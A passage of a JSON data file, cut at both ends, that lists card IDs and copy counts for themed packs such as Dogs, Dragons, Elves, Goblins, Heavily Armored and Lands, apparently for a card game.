"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Doctor-3": [
{
"id": "2d22fdde-5590-4a4c-af2e-09711f4b5ffd",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "e321bbb0-1660-4452-a9b7-d41674f7f743",
"count": 1
},
{
"id": "62498e3c-2e9b-4444-a61c-fae3f8906010",
"count": 1
},
{
"id": "b17da4d0-f9fd-43af-85fc-ede9fa3962bf",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "d5f80411-0a95-4e0a-b7a8-af23ddf385cc",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Doctor-4": [
{
"id": "b7026ffb-98de-4da7-84a8-1198639873f4",
"count": 1
},
{
"id": "2d22fdde-5590-4a4c-af2e-09711f4b5ffd",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "4caae1f4-dfb0-466f-9fa6-eb014767e3c8",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "6d389a05-2e1a-471d-a865-1c3b68a03e01",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Dogs-1": [
{
"id": "f762546c-f5eb-420d-a8f7-c3566cd8f506",
"count": 1
},
{
"id": "c392a7e5-6ff5-4c2f-9590-f8811a724f44",
"count": 1
},
{
"id": "0291a964-1117-4fbd-9193-9719b273c348",
"count": 1
},
{
"id": "13f7a7ef-aa18-4738-97db-97e50ec3b801",
"count": 1
},
{
"id": "3f602ecc-c264-4f3e-adeb-d0186668653e",
"count": 1
},
{
"id": "5a129ff7-72f9-4171-902d-a1b49eebfb62",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "0da7c6dc-9325-4866-8c09-78c7021f8f17",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "efe75b38-c145-420e-9446-f2ac443ab3a5",
"count": 7
}
],
"Dogs-2": [
{
"id": "f762546c-f5eb-420d-a8f7-c3566cd8f506",
"count": 1
},
{
"id": "c392a7e5-6ff5-4c2f-9590-f8811a724f44",
"count": 1
},
{
"id": "0291a964-1117-4fbd-9193-9719b273c348",
"count": 1
},
{
"id": "6afead32-3542-44c4-82d6-b6a81beb9f90",
"count": 1
},
{
"id": "13f7a7ef-aa18-4738-97db-97e50ec3b801",
"count": 1
},
{
"id": "3f602ecc-c264-4f3e-adeb-d0186668653e",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "0da7c6dc-9325-4866-8c09-78c7021f8f17",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "efe75b38-c145-420e-9446-f2ac443ab3a5",
"count": 7
}
],
"Dragons-1": [
{
"id": "2e9fa21a-a92e-4bcd-84fe-a7aa159fd0eb",
"count": 1
},
{
"id": "4ca8335b-21b1-40bc-970a-480e74874d03",
"count": 1
},
{
"id": "c5d3a18c-d030-494d-b7b1-4d1d1e27fbbf",
"count": 1
},
{
"id": "7bf663d3-850b-4a24-8e4b-08311adf4ed0",
"count": 1
},
{
"id": "017f94bc-f7f0-4eed-9ca0-392872405f32",
"count": 1
},
{
"id": "495c0dbf-1671-40f9-809c-98ef6d588512",
"count": 1
},
{
"id": "ac35ea21-fef4-4000-9b22-c8d07420827b",
"count": 1
},
{
"id": "d8a0ec06-7c48-4334-ac50-c249e7e91dbe",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "102740d0-ca74-460d-af30-c71bddad87c4",
"count": 1
},
{
"id": "cdb5eab0-5397-4c00-8cef-7d3baf38a171",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "1b8d1535-68e7-4ca0-aa71-fc7fc63090fc",
"count": 8
}
],
"Dragons-2": [
{
"id": "d8e5f3d8-c468-412c-a32b-92c5d8fc1e14",
"count": 1
},
{
"id": "c5d3a18c-d030-494d-b7b1-4d1d1e27fbbf",
"count": 1
},
{
"id": "2ce76e86-39f3-4ebf-b550-88ea7f23a91f",
"count": 1
},
{
"id": "333228c5-af16-4ebd-acfc-3776b21ef044",
"count": 1
},
{
"id": "7bf663d3-850b-4a24-8e4b-08311adf4ed0",
"count": 1
},
{
"id": "9460e3c6-e745-41d3-8e17-0b92fb126a16",
"count": 1
},
{
"id": "017f94bc-f7f0-4eed-9ca0-392872405f32",
"count": 1
},
{
"id": "495c0dbf-1671-40f9-809c-98ef6d588512",
"count": 1
},
{
"id": "d8a0ec06-7c48-4334-ac50-c249e7e91dbe",
"count": 1
},
{
"id": "47daba07-1f1e-48e1-a500-ef94d0a3b327",
"count": 1
},
{
"id": "cdb5eab0-5397-4c00-8cef-7d3baf38a171",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "1b8d1535-68e7-4ca0-aa71-fc7fc63090fc",
"count": 8
}
],
"Elves-1": [
{
"id": "44afd414-cc69-4888-ba12-7ea87e60b1f7",
"count": 1
},
{
"id": "ffc63793-9bf9-4c69-8f6d-74484bb40fda",
"count": 1
},
{
"id": "d95d4f15-613c-42f1-a49b-f4f604e69feb",
"count": 1
},
{
"id": "23680a1a-7c8d-4ea0-a62c-a302f07b6ed5",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "02cc1d52-04bd-4546-a20f-d2993654c830",
"count": 1
},
{
"id": "1776f5b4-1292-460f-9719-e1b603cee46c",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "6da62557-9783-4e6c-9b5f-2b77dbf96909",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "bba661af-c4a8-4230-830e-a9ee22b25d6b",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "9c301150-16a8-4ce3-818c-16d6fb0df1b7",
"count": 7
}
],
"Elves-2": [
{
"id": "0ee4a931-5d61-49ba-affc-f022263938ca",
"count": 1
},
{
"id": "d95d4f15-613c-42f1-a49b-f4f604e69feb",
"count": 1
},
{
"id": "58b3bd44-3b01-4507-b9be-ab94601ea736",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "02cc1d52-04bd-4546-a20f-d2993654c830",
"count": 1
},
{
"id": "1776f5b4-1292-460f-9719-e1b603cee46c",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "f61eae36-9c4a-4d72-9431-6cac34dbb527",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "6da62557-9783-4e6c-9b5f-2b77dbf96909",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "bba661af-c4a8-4230-830e-a9ee22b25d6b",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "9c301150-16a8-4ce3-818c-16d6fb0df1b7",
"count": 7
}
],
"Enchanted-1": [
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "2f060a74-dd75-4625-8842-27cb13a279e6",
"count": 1
},
{
"id": "2f81d2a0-5301-4cae-ac83-ad51647146e3",
"count": 1
},
{
"id": "59813c47-e779-404d-8a1c-70ea29bc7023",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "c3de35fd-425d-46b8-bc7d-c2f05d86858d",
"count": 1
},
{
"id": "207b7c60-ecf0-4661-8022-1e1714237e9f",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "aa4004b7-89b6-43f5-8d6e-13db1b08f3b8",
"count": 1
},
{
"id": "f5ba5d4b-5dbb-43d6-8f44-a2f80944df98",
"count": 1
},
{
"id": "c6f463b5-188f-4ecc-8cbf-0f200515bb09",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "999d82f8-6c64-4b6a-a8ac-fbc48dd1750c",
"count": 7
}
],
"Enchanted-2": [
{
"id": "8ea009c1-505e-4307-b8f3-2d37e36507a6",
"count": 1
},
{
"id": "2f060a74-dd75-4625-8842-27cb13a279e6",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "136dfcf5-130a-4d75-9785-a090215a29b1",
"count": 1
},
{
"id": "207b7c60-ecf0-4661-8022-1e1714237e9f",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "aa4004b7-89b6-43f5-8d6e-13db1b08f3b8",
"count": 1
},
{
"id": "f5ba5d4b-5dbb-43d6-8f44-a2f80944df98",
"count": 1
},
{
"id": "c6f463b5-188f-4ecc-8cbf-0f200515bb09",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "999d82f8-6c64-4b6a-a8ac-fbc48dd1750c",
"count": 7
}
],
"Feathered Friends-1": [
{
"id": "c5b57247-81cc-44ec-b5a9-0702111a98a8",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "ddbcb165-0a60-493a-8cbb-ba8b36c527da",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "b17da4d0-f9fd-43af-85fc-ede9fa3962bf",
"count": 1
},
{
"id": "58e84a4a-034f-4f55-a827-e62f2b61f091",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Feathered Friends-2": [
{
"id": "c5b57247-81cc-44ec-b5a9-0702111a98a8",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "ddbcb165-0a60-493a-8cbb-ba8b36c527da",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "e8cca776-b0e4-4cd2-815f-36c1f86cf497",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "7acd58e4-7dc7-4ca0-8750-2558ff97b5da",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Feathered Friends-3": [
{
"id": "b7ab81d4-aaf7-4c72-9651-5e1482126928",
"count": 1
},
{
"id": "c5b57247-81cc-44ec-b5a9-0702111a98a8",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "457eb507-bbbf-4064-bdb0-cfeefe2195df",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Feathered Friends-4": [
{
"id": "042b0148-5821-4105-9cda-a0e405eb8bee",
"count": 1
},
{
"id": "a9e8eb41-3800-4553-843b-ec27a44e8d55",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "a94f356d-4714-4500-8fb0-1ac68ec5c1cf",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "58e84a4a-034f-4f55-a827-e62f2b61f091",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Garruk": [
{
"id": "05f13bda-9157-437d-b58b-20d34d03fc49",
"count": 1
},
{
"id": "6649d5e9-22fb-4134-a4d9-ee05e6668f94",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "3928bbce-87b7-4b28-9af4-20362935c909",
"count": 1
},
{
"id": "9e0fa0b6-5f3f-4669-84e8-2c38c9593d88",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "93a56610-482b-4ddf-88e1-e4a2edf4fa0f",
"count": 1
},
{
"id": "af2fdbec-bca2-4af5-9c2a-28b0b35b18a3",
"count": 1
},
{
"id": "c12cf74d-aad9-41d8-959e-66557c39204d",
"count": 1
},
{
"id": "02392840-f0c4-462e-84ce-9a7cdd9f5efb",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "71a4860a-8bb6-45c0-b00a-b4a42da33ab9",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b6e049ae-bb12-41af-bbe4-ceded30bad67",
"count": 7
}
],
"Goblins-1": [
{
"id": "a4a514b9-8a67-47aa-8218-8d6fe8040128",
"count": 1
},
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "2c716d10-2130-43b7-a939-349d437e1091",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "b4c8e3b3-c8bb-415d-a19f-45ec679108ee",
"count": 1
},
{
"id": "a1214fc4-26ac-4a57-b894-6fd634d4d4fd",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Goblins-2": [
{
"id": "faca827d-0b35-48d7-acd6-13ecacc32b82",
"count": 1
},
{
"id": "a4a514b9-8a67-47aa-8218-8d6fe8040128",
"count": 1
},
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "2c716d10-2130-43b7-a939-349d437e1091",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "f19b4a80-41e1-4c5f-869a-682f08543f12",
"count": 1
},
{
"id": "a1214fc4-26ac-4a57-b894-6fd634d4d4fd",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Goblins-3": [
{
"id": "a4a514b9-8a67-47aa-8218-8d6fe8040128",
"count": 1
},
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "89fcc35b-76fa-4408-8620-a1e11b2caf1f",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "5b629eb0-0e84-4eaf-bbc3-ec85ae17a8a7",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "b4c8e3b3-c8bb-415d-a19f-45ec679108ee",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Goblins-4": [
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "cd9fec9d-23c8-4d35-97c1-9499527198fb",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "f19b4a80-41e1-4c5f-869a-682f08543f12",
"count": 1
},
{
"id": "a1214fc4-26ac-4a57-b894-6fd634d4d4fd",
"count": 1
},
{
"id": "660e7067-9f1d-4e2c-bd12-0ad752a3cec8",
"count": 1
},
{
"id": "34d6a2d0-d855-4b87-9f4c-58dda0b81c82",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Heavily Armored-1": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "12f43272-6681-41dd-8bfd-d18cc68171c1",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "fbb70e7b-2a68-436e-96a4-32a88fb87da0",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Heavily Armored-2": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "12f43272-6681-41dd-8bfd-d18cc68171c1",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "c7bac081-a946-4278-90f0-c0f262b7abf2",
"count": 1
},
{
"id": "77238879-6dc7-46ff-8354-89e60c2a04e9",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "fbb70e7b-2a68-436e-96a4-32a88fb87da0",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Heavily Armored-3": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "1b24d60d-bd80-4363-829c-a9d7f8c61fdf",
"count": 1
},
{
"id": "12f43272-6681-41dd-8bfd-d18cc68171c1",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "c7bac081-a946-4278-90f0-c0f262b7abf2",
"count": 1
},
{
"id": "352c4997-2b96-45da-a4e1-70a86453c6fa",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Heavily Armored-4": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "2002d263-3fe0-481a-b389-84e281b009d7",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "504698a9-1512-4288-b5ef-392d41ebcd05",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "fefef556-dd3c-49b9-a6f5-8b86af64416e",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Lands-1": [
{
"id": "7de98df4-9552-4ba6-a324-1669dc077d4c",
"count": 1
},
{
"id": "70180e04-1453-43dc-9bbb-ab0d6291a8b5",
"count": 1
},
{
"id": "45bc8745-9aaf-4b3c-922f-5a577324bb1f",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "e36a5be0-a730-4cb7-9d1e-6ae84b5bc872",
"count": 1
},
{
"id": "0700d1c1-faab-4a1a-b55d-a2fa4582a2b4",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "57b819f4-cabf-4a31-86f4-3213deb6b719",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "d00cb59d-de35-45b2-a7f8-f8c1e821f6ee",
"count": 1
},
{
"id": "180aa3d6-8475-4c98-a140-af736a9c135e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "88adbda4-7818-4888-a908-de6073bd0152",
"count": 7
}
],
"Lands-2": [
{
"id": "7de98df4-9552-4ba6-a324-1669dc077d4c",
"count": 1
},
{
"id": "70180e04-1453-43dc-9bbb-ab0d6291a8b5",
"count": 1
},
{
"id": "45bc8745-9aaf-4b3c-922f-5a577324bb1f",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "5de097e5-e960-4404-a370-defe93ce892f",
"count": 1
},
{
"id": "f2799310-c77a-47b2-b1a5-50c029600020",
"count": 1
},
{
"id": "e36a5be0-a730-4cb7-9d1e-6ae84b5bc872",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "a2e49925-a4ab-4960-ad83-20583dcd2c2c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "57b819f4-cabf-4a31-86f4-3213deb6b719",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
